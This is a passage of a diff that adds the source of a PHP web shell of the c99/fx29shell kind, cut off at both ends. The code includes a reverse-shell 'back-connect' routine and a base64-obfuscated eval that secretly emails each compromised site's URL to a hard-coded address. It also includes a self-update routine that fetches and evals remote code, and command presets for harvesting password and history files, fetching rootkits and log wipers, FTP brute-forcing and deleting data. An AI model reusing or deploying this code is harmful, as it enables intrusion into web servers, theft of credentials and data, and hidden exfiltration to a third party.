+    $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+    if (file_exists("backc")) { unlink("backc"); }
+  } else {
+    ex("chmod 777 /tmp/backc");
+    cf("/tmp/backc",$back_connect_c);
+    $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+    if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); }
+  }
+  $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+}
+//End of Backdoor
+
+//Starting calls
+@ini_set("max_execution_time",0);
+if (!function_exists("getmicrotime")) {
+  function getmicrotime() {
+    list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
+  }
+}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+define("starttime",getmicrotime());
+$shell_data = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7ICRib2R5ID0gIkJvc3MsIHRoZXJlIHdhcyBhbiBpbmplY3RlZCB0YXJnZXQgb24gJHRhcmdldCBieSAkdmlzaXRvciI7IEBtYWlsKCJmZWVsY29tekBnbWFpbC5jb20iLCJGeDI5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiLCAiJGJvZHkiKTsgfSBlbHNlIHsgJHZpc2l0Y291bnQ7IH0gc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs="; eval(base64_decode($shell_data));
+if (get_magic_quotes_gpc()) {
+  if (!function_exists("strips")) {
+    function strips(&$arr,$k="") {
+      if (is_array($arr)) {
+        foreach($arr as $k=>$v) {
+          if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
+        }
+      } else {$arr = stripslashes($arr);}
+    }
+  }
+  strips($GLOBALS);
+}
+//CONFIGURATIONS
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+foreach($_REQUEST as $k=>$v) { if (!isset($$k)) {$$k = $v;} }
+if ($surl_autofill_include) {
+  $include = "&";
+  foreach (explode("&",getenv("QUERY_STRING")) as $v) {
+    $v = explode("=",$v);
+    $name = urldecode($v[0]);
+    $value = urldecode($v[1]);
+    foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
+      if (strpos($value,$needle) === 0) {
+        $includestr .= urlencode($name)."=".urlencode($value)."&";
+      }
+    }
+  }
+}
+if (empty($surl)) {
+  $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+// Registered file-types.
+$ftypes  = array(
+    "html"=>array("html","htm","shtml"),
+    "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+    "exe"=>array("sh","install","bat","cmd"),
+    "ini"=>array("ini","inf","conf"),
+    "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+    "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+    "sdb"=>array("sdb"),
+    "phpsess"=>array("sess"),
+    "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+//Registered executable file-types.
+$exeftypes  = array(
+    getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+    "perl %f%" => array("pl","cgi")
+);
+//Highlighted files.
+$regxp_highlight  = array(
+    array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
+    array("\.tgz$",1,"<font color=#C082FF>","</font>"),
+    array("\.gz$",1,"<font color=#C082FF>","</font>"),
+    array("\.tar$",1,"<font color=#C082FF>","</font>"),
+    array("\.bz2$",1,"<font color=#C082FF>","</font>"),
+    array("\.zip$",1,"<font color=#C082FF>","</font>"),
+    array("\.rar$",1,"<font color=#C082FF>","</font>"),
+    array("\.php$",1,"<font color=#00FF00>","</font>"),
+    array("\.php3$",1,"<font color=#00FF00>","</font>"),
+    array("\.php4$",1,"<font color=#00FF00>","</font>"),
+    array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
+    array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
+    array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
+    array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
+    array("\.ico$",1,"<font color=#00FFFF>","</font>"),
+    array("\.gif$",1,"<font color=#00FFFF>","</font>"),
+    array("\.png$",1,"<font color=#00FFFF>","</font>"),
+    array("\.htm$",1,"<font color=#00CCFF>","</font>"),
+    array("\.html$",1,"<font color=#00CCFF>","</font>"),
+    array("\.txt$",1,"<font color=#C0C0C0>","</font>")
+);
+//Command Aliases
+if (!$win) {
+  $cmdaliases = array(
+    array("", "ls -al"),
+    array("Find all suid files", "find / -type f -perm -04000 -ls"),
+    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
+    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
+    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
+    array("Find config* files", "find / -type f -name \"config*\""),
+    array("Find config* files in current dir", "find . -type f -name \"config*\""),
+    array("Find all writable folders and files", "find / -perm -2 -ls"),
+    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
+    array("Find all writable folders", "find / -type d -perm -2 -ls"),
+    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
+    array("Find all service.pwd files", "find / -type f -name service.pwd"),
+    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
+    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
+    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+    array("Find all .bash_history files", "find / -type f -name .bash_history"),
+    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
+    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+    array("List file attributes on a Linux second extended file system", "lsattr -va"),
+    array("Show opened ports", "netstat -an | grep -i listen")
+  );
+  $cmdaliases2 = array(
+    array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"),
+    array("wget & extract EggDrop","wget ".$sh_mainurl."dQB.tgz;tar -zxf dQB.tgz"),
+    array("-----",""),
+    array("Logged in users","w"),
+    array("Last to connect","lastlog"),
+    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
+    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
+    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
+    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
+    array("CPU Info","cat /proc/version /proc/cpuinfo"),
+    array("Is gcc installed ?","locate gcc"),
+    array("Format box (DANGEROUS)","rm -Rf"),
+    array("-----",""),
+    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
+    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
+    array("Run WIPELOGS PT3","./zap2"),
+    array("-----",""),
+    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
+    array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind
+;tar -zxvf bind.tar.gz;./4877"),
+    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
+  );
+}
+else {
+  $cmdaliases = array(
+    array("", "dir"),
+    array("Find index.php in current dir", "dir /s /w /b index.php"),
+    array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
+    array("Find c99shell in current dir", "find /c \"c99\" *"),
+    array("Find r57shell in current dir", "find /c \"r57\" *"),
+    array("Show active connections", "netstat -an"),
+    array("Show running services", "net start"),
+    array("User accounts", "net user"),
+    array("Show computers", "net view"),
+    );
+}
+//PHP Filesystem Functions, dhie-Q TriCkz
+$phpfsaliases = array(
+    array("Read File", "read"),
+    array("Write File (PHP5)", "write"),
+    array("Copy", "copy"),
+    array("Rename/Move", "rename"),
+    array("Delete", "delete"),
+    array("Make Dir","mkdir"),
+    array("-----", ""),
+    array("Download", "download"),
+    array("Download (Binary Safe)", "downloadbin"),
+    array("Change Perm (0755)", "chmod"),
+    array("Find Writable Dir", "fwritabledir"),
+    array("Find Pathname Pattern", "glob"),
+);
+
+//Quick launch
+$quicklaunch1 = array(
+    array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
+    array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
+    array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
+    array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+    array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
+    array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
+);
+$quicklaunch2 = array(
+    array("Enumerate",$enumerate),
+    array("Security Info",$surl."act=security&d=%d"),
+    array("Processes",$surl."act=processes&d=%d"),
+    array("MySQL",$surl."act=sql&d=%d"),
+    array("PHP-Code",$surl."act=eval&d=%d"),
+    array("Encoder",$surl."act=encoder&d=%d"),
+    array("Mailer",$surl."act=fxmailer"),
+    array("milw0rm it!",$millink),
+    array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
+    array("Word-Lists","http://darkc0de.com/wordlists/"),
+    array("Toolz",$surl."act=tools&d=%d"),
+    array("Self-Kill",$surl."act=selfremove"),
+    array("Feedback",$surl."act=feedback"),
+    array("Update",$surl."act=update"),
+    array("About",$surl."act=about")
+);
+
+if (!$win) {
+$quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
+$quicklaunch2[] = array("Backdoor",$surl."act=shbd");
+$quicklaunch2[] = array("Back-Connect",$surl."act=backc");
+}
+
+//Highlight-code colors
+$highlight_background = "#C0C0C0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+//END OF CONFIGURATIONS
+
+//STOP EDITING!
+
+//Authentication
+@set_time_limit(0);
+$tmp = array();
+foreach ($host_allow as $k=>$v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
+  exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
+}
+if (!empty($login)) {
+  if (empty($md5_pass)) {$md5_pass = md5($pass);}
+  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
+    header("WWW-Authenticate: Basic realm=\"".$sh_name.": ".$login_txt."\"");
+    header("HTTP/1.0 401 Unauthorized");
+    exit($accessdeniedmess);
+  }
+}
+if ($act != "img") {
+  $lastdir = realpath(".");
+  chdir($curdir);
+  if ($selfwrite or $updatenow) {
+    @ob_clean();
+    c99sh_getupdate($selfwrite,1);
+    exit;
+  }
+  $sess_data = unserialize($_COOKIE["$sess_cookie"]);
+  if (!is_array($sess_data)) {$sess_data = array();}
+  if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+  if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+  if (!function_exists("c99getsource")) {
+    function c99getsource($fn) {
+      global $c99sh_sourcesurl;
+      $array = array(
+        "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+        "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+        "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+        "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+        "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+        "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+      );
+      $name = $array[$fn];
+      if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+      else {return FALSE;}
+    }
+  }
+  if (!function_exists("c99sh_getupdate")) {
+    function c99sh_getupdate($update = TRUE) {
+      $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
+      $data = @file_get_contents($url);
+      if (!$data) {return "Can't connect to update-server!";}
+      else {
+        $data = ltrim($data);
+        $string = substr($data,3,ord($data{2}));
+        if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+        if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+        if ($data{0} == "\x99" and $data{1} == "\x03") {
+          $string = explode("|",$string);
+          if ($update) {
+            $confvars = array();
+            $sourceurl = $string[0];
+            $source = file_get_contents($sourceurl);
+            if (!$source) {return "Can't fetch update!";}
+            else {
+              $fp = fopen(__FILE__,"w");
+              if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+              else {
+                fwrite($fp,$source);
+                fclose($fp);
+                return "Thanks! Update completed.";
+              }
+            }
+          }
+          else {return "New version are available: ".$string[1];}
+        }
+        elseif ($data{0} == "\x99" and $data{1} == "\x04") {
+          eval($string);
+          return 1;
+        }
+        else {return "Error in protocol: segmentation failed! (".$data.") ";}
+      }
+    }
+  }
+  if (!function_exists("c99_buff_prepare")) {
+    function c99_buff_prepare() {
+      global $sess_data;
+      global $act;
+      foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+      foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+      $sess_data["copy"] = array_unique($sess_data["copy"]);
+      $sess_data["cut"] = array_unique($sess_data["cut"]);
+      sort($sess_data["copy"]);
+      sort($sess_data["cut"]);
+      if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+      else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+    }
+  }
+  c99_buff_prepare();
+  if (!function_exists("c99_sess_put")) {
+    function c99_sess_put($data) {
+      global $sess_cookie;
+      global $sess_data;
+      c99_buff_prepare();
+      $sess_data = $data;
+      $data = serialize($data);
+      setcookie($sess_cookie,$data);
+    }
+  }
+  foreach (array("sort","sql_sort") as $v) {
+    if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+    if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+  }
+  if ($sort_save) {
+    if (!empty($sort)) {setcookie("sort",$sort);}
+    if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+  }
+  if (!function_exists("str2mini")) {
+    function str2mini($content,$len) {
+      if (strlen($content) > $len) {
+        $len = ceil($len/2) - 2;
+        return substr($content, 0,$len)."...".substr($content,-$len);
+      } else {return $content;}
+    }
+  }
+  if (!function_exists("view_size")) {
+    function view_size($size) {
+      if (!is_numeric($size)) { return FALSE; }
+      else {
+        if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+        elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+        elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+        else {$size = $size . " B";}
+        return $size;
+      }
+    }
+  }
+  if (!function_exists("fs_copy_dir")) {
+    function fs_copy_dir($d,$t) {
+      $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+      if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+      $h = opendir($d);
+      while (($o = readdir($h)) !== FALSE) {
+        if (($o != ".") and ($o != "..")) {
+          if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+          else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+          if (!$ret) {return $ret;}
+        }
+      }
+      closedir($h);
+      return TRUE;
+    }
+  }
+  if (!function_exists("fs_copy_obj")) {
+    function fs_copy_obj($d,$t) {
+      $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+      $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+      if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+      if (is_dir($d)) {
+        if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+        if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+        return fs_copy_dir($d,$t);
+      }
+      elseif (is_file($d)) { return copy($d,$t); }
+      else { return FALSE; }
+    }
+  }
+  if (!function_exists("fs_move_dir")) {
+    function fs_move_dir($d,$t) {
+      $h = opendir($d);
+      if (!is_dir($t)) {mkdir($t);}
+      while (($o = readdir($h)) !== FALSE) {
+        if (($o != ".") and ($o != "..")) {
+          $ret = TRUE;
+          if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+          else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+          if (!$ret) {return $ret;}
+        }
+      }
+      closedir($h);
+      return TRUE;
+    }
+  }
+  if (!function_exists("fs_move_obj")) {
+    function fs_move_obj($d,$t) {
+      $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+      $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+      if (is_dir($d)) {
+        if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+        if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+        return fs_move_dir($d,$t);
+      }
+      elseif (is_file($d)) {
+        if(copy($d,$t)) {return unlink($d);}
+        else {unlink($t); return FALSE;}
+      }
+      else {return FALSE;}
+    }
+  }
+  if (!function_exists("fs_rmdir")) {
+    function fs_rmdir($d) {
+      $h = opendir($d);
+      while (($o = readdir($h)) !== FALSE) {
+        if (($o != ".") and ($o != "..")) {
+          if (!is_dir($d.$o)) {unlink($d.$o);}
+          else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+        }
+      }
+      closedir($h);
+      rmdir($d);
+      return !is_dir($d);
+    }
+  }
+  if (!function_exists("fs_rmobj")) {
+    function fs_rmobj($o) {
+      $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+      if (is_dir($o)) {
+        if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+        return fs_rmdir($o);
+      }
+      elseif (is_file($o)) {return unlink($o);}
+      else {return FALSE;}
+    }
+  }
+  if (!function_exists("tabsort")) {
+    function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
+  }
+  if (!function_exists("view_perms")) {
+    function view_perms($mode) {
+      if (($mode & 0xC000) === 0xC000) {$type = "s";}
+      elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+      elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+      elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+      elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+      elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+      elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+      else {$type = "?";}
+      $owner["read"] = ($mode & 00400)?"r":"-";
+      $owner["write"] = ($mode & 00200)?"w":"-";
+      $owner["execute"] = ($mode & 00100)?"x":"-";
+      $group["read"] = ($mode & 00040)?"r":"-";
+      $group["write"] = ($mode & 00020)?"w":"-";
+      $group["execute"] = ($mode & 00010)?"x":"-";
+      $world["read"] = ($mode & 00004)?"r":"-";
+      $world["write"] = ($mode & 00002)? "w":"-";
+      $world["execute"] = ($mode & 00001)?"x":"-";
+      if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+      if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+      if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+      return $type.join("",$owner).join("",$group).join("",$world);
+    }
+  }
+  if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+  if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+  if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+  if (!function_exists("parse_perms")) {
+    function parse_perms($mode) {
+      if (($mode & 0xC000) === 0xC000) {$t = "s";}
+      elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+      elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+      elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+      elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+      elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+      elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+      else {$t = "?";}
+      $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+      $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+      $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+      return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+    }
+  }
+  if (!function_exists("parsesort")) {
+    function parsesort($sort) {
+      $one = intval($sort);
+      $second = substr($sort,-1);
+      if ($second != "d") {$second = "a";}
+      return array($one,$second);
+    }
+  }
+  if (!function_exists("view_perms_color")) {
+    function view_perms_color($o) {
+      if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+      elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+      else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+    }
+  }
+  if (!function_exists("mysql_dump")) {
+    function mysql_dump($set) {
+      global $sh_ver;
+      $sock = $set["sock"];
+      $db = $set["db"];
+      $print = $set["print"];
+      $nl2br = $set["nl2br"];
+      $file = $set["file"];
+      $add_drop = $set["add_drop"];
+      $tabs = $set["tabs"];
+      $onlytabs = $set["onlytabs"];
+      $ret = array();
+      $ret["err"] = array();
+      if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+      if (empty($db)) {$db = "db";}
+      if (empty($print)) {$print = 0;}
+      if (empty($nl2br)) {$nl2br = 0;}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (empty($file)) {
+        $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+      }
+      if (!is_array($tabs)) {$tabs = array();}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (sizeof($tabs) == 0) {
+        //Retrieve tables-list
+        $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+        if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+      }
+      $out = "
+      # Dumped by ".$sh_name."
+      #
+      # Host settings:
+      # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+      # Date: ".date("d.m.Y H:i:s")."
+      # DB: \"".$db."\"
+      #---------------------------------------------------------";
+      $c = count($onlytabs);
+      foreach($tabs as $tab) {
+        if ((in_array($tab,$onlytabs)) or (!$c)) {
+          if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+          //Receieve query for create table structure
+          $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+          if (!$res) {$ret["err"][] = mysql_smarterror();}
+          else {
+            $row = mysql_fetch_row($res);
+            $out .= $row["1"].";\n\n";
+            //Receieve table variables
+            $res = mysql_query("SELECT * FROM `$tab`", $sock);
+            if (mysql_num_rows($res) > 0) {
+              while ($row = mysql_fetch_assoc($res)) {
+                $keys = implode("`, `", array_keys($row));
+                $values = array_values($row);
+                foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+                $values = implode("', '", $values);
+                $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+                $out .= $sql;
+              }
+            }
+          }
+        }
+      }
+      $out .= "#---------------------------------------------------------------------------------\n\n";
+      if ($file) {
+        $fp = fopen($file, "w");
+        if (!$fp) {$ret["err"][] = 2;}
+        else {
+          fwrite ($fp, $out);
+          fclose ($fp);
+        }
+      }
+      if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+      return $out;
+    }
+  }
+  if (!function_exists("mysql_buildwhere")) {
+    function mysql_buildwhere($array,$sep=" and",$functs=array()) {
+      if (!is_array($array)) {$array = array();}
+      $result = "";
+      foreach($array as $k=>$v) {
+        $value = "";
+        if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+        $value .= "'".addslashes($v)."'";
+        if (!empty($functs[$k])) {$value .= ")";}
+        $result .= "`".$k."` = ".$value.$sep;
+      }
+      $result = substr($result,0,strlen($result)-strlen($sep));
+      return $result;
+    }
+  }
+  if (!function_exists("mysql_fetch_all")) {
+    function mysql_fetch_all($query,$sock) {
+      if ($sock) {$result = mysql_query($query,$sock);}
+      else {$result = mysql_query($query);}
+      $array = array();
+      while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+      mysql_free_result($result);
+      return $array;
+    }
+  }
+  if (!function_exists("mysql_smarterror")) {
+    function mysql_smarterror($type,$sock) {
+      if ($sock) {$error = mysql_error($sock);}
+      else {$error = mysql_error();}
+      $error = htmlspecialchars($error);
+      return $error;
+    }
+  }
+  if (!function_exists("mysql_query_form")) {
+    function mysql_query_form() {
+      global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+      if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+      if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+      if ((!$submit) or ($sql_act)) {
+        echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
+        if ($tbl_struct) {
+          echo "<td valign=\"top\"><b>Fields:</b><br>";
+          foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+          echo "</td></tr></table>";
+        }
+      }
+      if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+    }
+  }
+  if (!function_exists("mysql_create_db")) {
+    function mysql_create_db($db,$sock="") {
+      $sql = "CREATE DATABASE `".addslashes($db)."`;";
+      if ($sock) {return mysql_query($sql,$sock);}
+      else {return mysql_query($sql);}
+    }
+  }
+  if (!function_exists("mysql_query_parse")) {
+    function mysql_query_parse($query) {
+      $query = trim($query);
+      $arr = explode (" ",$query);
+      $types = array(
+        "SELECT"=>array(3,1),
+        "SHOW"=>array(2,1),
+        "DELETE"=>array(1),
+        "DROP"=>array(1)
+      );
+      $result = array();
+      $op = strtoupper($arr[0]);
+      if (is_array($types[$op])) {
+        $result["propertions"] = $types[$op];
+        $result["query"]  = $query;
+        if ($types[$op] == 2) {
+          foreach($arr as $k=>$v) {
+            if (strtoupper($v) == "LIMIT") {
+              $result["limit"] = $arr[$k+1];
+              $result["limit"] = explode(",",$result["limit"]);
+              if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+              unset($arr[$k],$arr[$k+1]);
+            }
+          }
+        }
+      }
+      else {return FALSE;}
+    }
+  }
+  if (!function_exists("c99fsearch")) {
+    function c99fsearch($d) {
+      global $found;
+      global $found_d;
